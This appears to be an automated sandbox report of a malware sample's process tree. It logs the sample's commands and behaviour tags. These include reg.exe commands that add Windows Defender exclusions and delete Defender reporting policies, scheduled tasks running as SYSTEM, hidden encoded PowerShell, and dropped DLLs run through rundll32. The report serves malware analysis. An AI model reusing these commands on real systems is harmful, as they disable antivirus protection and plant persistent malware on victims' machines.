  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wMiAwpnFkXrivKVB /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wMiAwpnFkXrivKVB /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\erzvrHvcaZerrtDXV /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lhYCvcGAfKQiHdyz /t REG_DWORD /d 0 /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\lhYCvcGAfKQiHdyz /t REG_DWORD /d 0 /reg:64
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /CREATE /TN "gxPFTwkiS" /SC once /ST 02:54:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /run /I /tn "gxPFTwkiS"
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /DELETE /F /TN "gxPFTwkiS"
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /CREATE /TN "ZfXrITCAwqWWdJVle" /SC once /ST 04:36:31 /RU "SYSTEM" /TR "\"C:\Windows\Temp\lhYCvcGAfKQiHdyz\TUiVwphJwWVEcGl\tawQnMM.exe\" Rv /site_id 525403 /S" /V1 /F
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /run /I /tn "ZfXrITCAwqWWdJVle"
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE [depth 1]
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe [depth 2]
  "C:\Windows\system32\gpupdate.exe" /force
-
C:\Windows\system32\svchost.exe [depth 1]
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
-
C:\Windows\system32\gpscript.exe [depth 1]
  gpscript.exe /RefreshSystemParam
-
C:\Windows\Temp\lhYCvcGAfKQiHdyz\TUiVwphJwWVEcGl\tawQnMM.exe [depth 1]
  C:\Windows\Temp\lhYCvcGAfKQiHdyz\TUiVwphJwWVEcGl\tawQnMM.exe Rv /site_id 525403 /S
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /DELETE /F /TN "bNpHvRwEXzIclVjPnA"
-
C:\Windows\SysWOW64\cmd.exe [depth 2]
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
-
C:\Windows\SysWOW64\cmd.exe [depth 2]
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jFRyDUODU\PHErXK.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "bcMXixuPVnLBvIi" /V1 /F
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /CREATE /TN "bcMXixuPVnLBvIi2" /F /xml "C:\Program Files (x86)\jFRyDUODU\YOItBGr.xml" /RU "SYSTEM"
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /END /TN "bcMXixuPVnLBvIi"
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /DELETE /F /TN "bcMXixuPVnLBvIi"
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /CREATE /TN "BohWRrpvXkQUIE" /F /xml "C:\Program Files (x86)\oCfcnVibUgRU2\ioQojJk.xml" /RU "SYSTEM"
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /CREATE /TN "MHnDegfkwbmnw2" /F /xml "C:\ProgramData\wMiAwpnFkXrivKVB\XXWSrOR.xml" /RU "SYSTEM"
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /CREATE /TN "VEAFvbUpjoQCUTEsX2" /F /xml "C:\Program Files (x86)\jWYIfSfaEDaYgVKkjRR\qkmUJcE.xml" /RU "SYSTEM"
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /CREATE /TN "uvJLzDjkAdvbwQszjeG2" /F /xml "C:\Program Files (x86)\SfrSbxhXbhVCC\fkEKoFh.xml" /RU "SYSTEM"
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /CREATE /TN "kYTQWNyBMOqWrvtpH" /SC once /ST 00:17:25 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\lhYCvcGAfKQiHdyz\oPOCVhZS\sEgXgnq.dll\",#1 /site_id 525403" /V1 /F
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /run /I /tn "kYTQWNyBMOqWrvtpH"
-
C:\Windows\SysWOW64\cmd.exe [depth 2]
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
-
C:\Windows\SysWOW64\cmd.exe [depth 2]
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
-
C:\Windows\SysWOW64\reg.exe [depth 3]
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
-
C:\Windows\SysWOW64\schtasks.exe [depth 2]
  schtasks /DELETE /F /TN "ZfXrITCAwqWWdJVle"
-
C:\Windows\system32\rundll32.EXE [depth 1]
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lhYCvcGAfKQiHdyz\oPOCVhZS\sEgXgnq.dll",#1 /site_id 525403
-
C:\Windows\SysWOW64\rundll32.exe [depth 2]
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\lhYCvcGAfKQiHdyz\oPOCVhZS\sEgXgnq.dll",#1 /site_id 525403
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\schtasks.exe [depth 3]
  schtasks /DELETE /F /TN "kYTQWNyBMOqWrvtpH"
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads